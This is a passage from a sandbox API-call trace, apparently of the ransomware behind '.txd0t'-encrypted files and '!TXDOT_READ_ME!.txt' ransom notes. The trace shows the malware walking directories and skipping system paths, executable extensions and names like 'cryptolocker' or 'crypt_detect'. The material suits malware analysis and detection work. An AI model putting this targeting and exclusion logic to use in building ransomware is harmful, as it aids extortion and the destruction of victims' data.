returned 1 [0128.738] StrCmpIW (psz1="SetupResources.dll", psz2="boot.ini") returned 1 [0128.738] StrCmpIW (psz1="SetupResources.dll", psz2="desktop.ini") returned 1 [0128.738] StrCmpIW (psz1="SetupResources.dll", psz2="autorun.inf") returned 1 [0128.738] StrCmpIW (psz1="SetupResources.dll", psz2="ntuser.dat") returned 1 [0128.738] StrCmpIW (psz1="SetupResources.dll", psz2="ntldr") returned 1 [0128.738] StrCmpIW (psz1="SetupResources.dll", psz2="ntdetect.com") returned 1 [0128.738] StrCmpIW (psz1="SetupResources.dll", psz2="bootfont.bin") returned 1 [0128.738] StrCmpIW (psz1="SetupResources.dll", psz2="!TXDOT_READ_ME!.txt") returned 1 [0128.738] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0128.739] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".dll") returned=".dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0128.739] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3b58, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0128.739] FindClose (in: hFindFile=0xec2270 | out: hFindFile=0xec2270) returned 1 [0128.739] GetProcessHeap () returned 0xe30000 [0128.739] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6874278 | out: hHeap=0xe30000) returned 1 [0128.739] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x586c4a47, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x586c4a47, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="1043", cAlternateFileName="")) returned 1 [0128.739] StrCmpW (psz1="1043", psz2=".") returned 1 [0128.739] StrCmpW (psz1="1043", psz2="..") returned 1 [0128.739] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0128.739] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0128.739] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="1043", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\1043") returned="C:\\588bce7c90097ed212\\1043" [0128.739] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1043", lpSrch="\\windows\\system32\\") returned 0x0 [0128.739] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1043", lpSrch="\\windows\\syswow64\\") returned 0x0 [0128.739] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1043", lpSrch="\\windows\\system\\") returned 0x0 [0128.739] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1043", lpSrch="\\windows\\winsxs\\") returned 0x0 [0128.739] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1043", lpSrch="\\appdata\\roaming\\") returned 0x0 [0128.739] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1043", lpSrch="\\appdata\\local\\") returned 0x0 [0128.739] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1043", lpSrch="\\appdata\\locallow\\") returned 0x0 [0128.739] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1043", lpSrch="\\all users\\microsoft\\") returned 0x0 [0128.739] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1043", lpSrch="\\inetpub\\logs\\") returned 0x0 [0128.739] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1043", lpSrch=":\\boot\\") returned 0x0 [0128.739] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1043", lpSrch=":\\perflogs\\") returned 0x0 [0128.739] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1043", lpSrch=":\\programdata\\") returned 0x0 [0128.739] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1043", lpSrch=":\\drivers\\") returned 0x0 [0128.739] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1043", lpSrch=":\\wsus\\") returned 0x0 [0128.739] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1043", lpSrch=":\\efstmpwp\\") returned 0x0 [0128.739] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1043", lpSrch=":\\$recycle.bin\\") returned 0x0 [0128.739] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1043", lpSrch="crypt_detect") returned 0x0 [0128.739] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1043", lpSrch="cryptolocker") returned 0x0 [0128.739] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1043", lpSrch="ransomware") returned 0x0 [0128.739] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1043", lpSrch="C:\\WINDOWS") returned 0x0 [0128.739] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1043", lpSrch="C:\\Program Files (x86)") returned 0x0 [0128.739] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1043", lpSrch="C:\\Program Files") returned 0x0 [0128.740] GetProcessHeap () returned 0xe30000 [0128.740] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b6) returned 0x6874278 [0128.740] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\1043", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1043") returned="C:\\588bce7c90097ed212\\1043" [0128.740] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1043", psz2="\\*", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1043\\*") returned="C:\\588bce7c90097ed212\\1043\\*" [0128.740] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1043\\*", lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x586c4a47, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x586c4a47, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2270 [0128.740] StrCmpW (psz1=".", psz2=".") returned 0 [0128.740] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x586c4a47, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x586c4a47, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0128.740] StrCmpW (psz1="..", psz2=".") returned 1 [0128.740] StrCmpW (psz1="..", psz2="..") returned 0 [0128.740] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x584ec712, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x584ec712, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x58512926, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0128.740] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0128.740] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0128.740] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\1043", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1043") returned="C:\\588bce7c90097ed212\\1043" [0128.740] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1043", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1043\\") returned="C:\\588bce7c90097ed212\\1043\\" [0128.740] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1043\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1043\\!TXDOT_READ_ME!.txt") returned="C:\\588bce7c90097ed212\\1043\\!TXDOT_READ_ME!.txt" [0128.740] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0128.740] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0128.740] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0128.740] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0128.740] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0128.740] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0128.740] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0128.740] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0128.740] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0128.740] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0128.740] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0128.740] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0128.740] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0128.740] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0128.740] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0128.740] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0128.740] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x584ec712, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xfda, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="eula.rtf.txd0t", cAlternateFileName="EULART~1.TXD")) returned 1 [0128.741] StrCmpW (psz1="eula.rtf.txd0t", psz2=".") returned 1 [0128.741] StrCmpW (psz1="eula.rtf.txd0t", psz2="..") returned 1 [0128.741] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\1043", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1043") returned="C:\\588bce7c90097ed212\\1043" [0128.741] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1043", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1043\\") returned="C:\\588bce7c90097ed212\\1043\\" [0128.741] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1043\\", psz2="eula.rtf.txd0t", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1043\\eula.rtf.txd0t") returned="C:\\588bce7c90097ed212\\1043\\eula.rtf.txd0t" [0128.741] PathFindExtensionW (pszPath="eula.rtf.txd0t") returned=".txd0t" [0128.741] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.741] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x586021aa, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x13912, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="LocalizedData.xml.txd0t", cAlternateFileName="LOCALI~1.TXD")) returned 1 [0128.741] StrCmpW (psz1="LocalizedData.xml.txd0t", psz2=".") returned 1 [0128.741] StrCmpW (psz1="LocalizedData.xml.txd0t", psz2="..") returned 1 [0128.741] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\1043", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1043") returned="C:\\588bce7c90097ed212\\1043" [0128.741] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1043", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1043\\") returned="C:\\588bce7c90097ed212\\1043\\" [0128.741] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1043\\", psz2="LocalizedData.xml.txd0t", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1043\\LocalizedData.xml.txd0t") returned="C:\\588bce7c90097ed212\\1043\\LocalizedData.xml.txd0t" [0128.741] PathFindExtensionW (pszPath="LocalizedData.xml.txd0t") returned=".txd0t" [0128.741] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.741] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4b58, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0128.741] StrCmpW (psz1="SetupResources.dll", psz2=".") returned 1 [0128.741] StrCmpW (psz1="SetupResources.dll", psz2="..") returned 1 [0128.741] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\1043", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1043") returned="C:\\588bce7c90097ed212\\1043" [0128.741] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1043", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1043\\") returned="C:\\588bce7c90097ed212\\1043\\" [0128.741] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1043\\", psz2="SetupResources.dll", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1043\\SetupResources.dll") returned="C:\\588bce7c90097ed212\\1043\\SetupResources.dll" [0128.741] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0128.741] StrCmpW (psz1=".dll", psz2=".txd0t") returned -1 [0128.741] StrCmpIW (psz1="SetupResources.dll", psz2="bootsect.bak") returned 1 [0128.741] StrCmpIW (psz1="SetupResources.dll", psz2="iconcache.db") returned 1 [0128.741] StrCmpIW (psz1="SetupResources.dll", psz2="thumbs.db") returned -1 [0128.741] StrCmpIW (psz1="SetupResources.dll", psz2=" ransomware ") returned 1 [0128.741] StrCmpIW (psz1="SetupResources.dll", psz2=" ransom ") returned 1 [0128.741] StrCmpIW (psz1="SetupResources.dll", psz2="debug.txt") returned 1 [0128.741] StrCmpIW (psz1="SetupResources.dll", psz2="boot.ini") returned 1 [0128.741] StrCmpIW (psz1="SetupResources.dll", psz2="desktop.ini") returned 1 [0128.741] StrCmpIW (psz1="SetupResources.dll", psz2="autorun.inf") returned 1 [0128.741] StrCmpIW (psz1="SetupResources.dll", psz2="ntuser.dat") returned 1 [0128.741] StrCmpIW (psz1="SetupResources.dll", psz2="ntldr") returned 1 [0128.741] StrCmpIW (psz1="SetupResources.dll", psz2="ntdetect.com") returned 1 [0128.741] StrCmpIW (psz1="SetupResources.dll", psz2="bootfont.bin") returned 1 [0128.742] StrCmpIW (psz1="SetupResources.dll", psz2="!TXDOT_READ_ME!.txt") returned 1 [0128.742] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0128.742] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".dll") returned=".dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0128.742] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4b58, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0128.742] FindClose (in: hFindFile=0xec2270 | out: hFindFile=0xec2270) returned 1 [0128.742] GetProcessHeap () returned 0xe30000 [0128.742] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6874278 | out: hHeap=0xe30000) returned 1 [0128.742] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x5881c229, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5881c229, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="1044", cAlternateFileName="")) returned 1 [0128.742] StrCmpW (psz1="1044", psz2=".") returned 1 [0128.742] StrCmpW (psz1="1044", psz2="..") returned 1 [0128.742] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0128.742] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0128.742] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="1044", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\1044") returned="C:\\588bce7c90097ed212\\1044" [0128.742] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1044", lpSrch="\\windows\\system32\\") returned 0x0 [0128.742] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1044", lpSrch="\\windows\\syswow64\\") returned 0x0 [0128.742] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1044", lpSrch="\\windows\\system\\") returned 0x0 [0128.742] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1044", lpSrch="\\windows\\winsxs\\") returned 0x0 [0128.742] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1044", lpSrch="\\appdata\\roaming\\") returned 0x0 [0128.742] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1044", lpSrch="\\appdata\\local\\") returned 0x0 [0128.742] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1044", lpSrch="\\appdata\\locallow\\") returned 0x0 [0128.742] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1044", lpSrch="\\all users\\microsoft\\") returned 0x0 [0128.742] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1044", lpSrch="\\inetpub\\logs\\") returned 0x0 [0128.742] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1044", lpSrch=":\\boot\\") returned 0x0 [0128.742] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1044", lpSrch=":\\perflogs\\") returned 0x0 [0128.742] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1044", lpSrch=":\\programdata\\") returned 0x0 [0128.742] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1044", lpSrch=":\\drivers\\") returned 0x0 [0128.742] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1044", lpSrch=":\\wsus\\") returned 0x0 [0128.742] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1044", lpSrch=":\\efstmpwp\\") returned 0x0 [0128.742] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1044", lpSrch=":\\$recycle.bin\\") returned 0x0 [0128.742] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1044", lpSrch="crypt_detect") returned 0x0 [0128.742] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1044", lpSrch="cryptolocker") returned 0x0 [0128.743] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1044", lpSrch="ransomware") returned 0x0 [0128.743] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1044", lpSrch="C:\\WINDOWS") returned 0x0 [0128.743] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1044", lpSrch="C:\\Program Files (x86)") returned 0x0 [0128.743] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1044", lpSrch="C:\\Program Files") returned 0x0 [0128.743] GetProcessHeap () returned 0xe30000 [0128.743] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b6) returned 0x6874278 [0128.743] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\1044", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1044") returned="C:\\588bce7c90097ed212\\1044" [0128.743] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1044", psz2="\\*", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1044\\*") returned="C:\\588bce7c90097ed212\\1044\\*" [0128.743] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1044\\*", lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x5881c229, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5881c229, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec23f0 [0128.743] StrCmpW (psz1=".", psz2=".") returned 0 [0128.743] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x5881c229, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5881c229, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0128.743] StrCmpW (psz1="..", psz2=".") returned 1 [0128.743] StrCmpW (psz1="..", psz2="..") returned 0 [0128.743] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x585e874b, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x585e874b, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x587835ce, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0128.743] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0128.743] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0128.743] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\1044", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1044") returned="C:\\588bce7c90097ed212\\1044" [0128.743] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1044", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1044\\") returned="C:\\588bce7c90097ed212\\1044\\" [0128.743] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1044\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1044\\!TXDOT_READ_ME!.txt") returned="C:\\588bce7c90097ed212\\1044\\!TXDOT_READ_ME!.txt" [0128.743] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0128.743] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0128.743] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0128.743] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0128.744] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0128.744] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0128.744] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0128.744] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0128.744] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0128.744] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0128.744] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0128.744] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0128.744] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0128.744] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0128.744] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0128.744] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0128.744] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x585ab28c, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xde6, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="eula.rtf.txd0t", cAlternateFileName="EULART~1.TXD")) returned 1 [0128.744] StrCmpW (psz1="eula.rtf.txd0t", psz2=".") returned 1 [0128.744] StrCmpW (psz1="eula.rtf.txd0t", psz2="..") returned 1 [0128.744] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\1044", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1044") returned="C:\\588bce7c90097ed212\\1044" [0128.744] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1044", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1044\\") 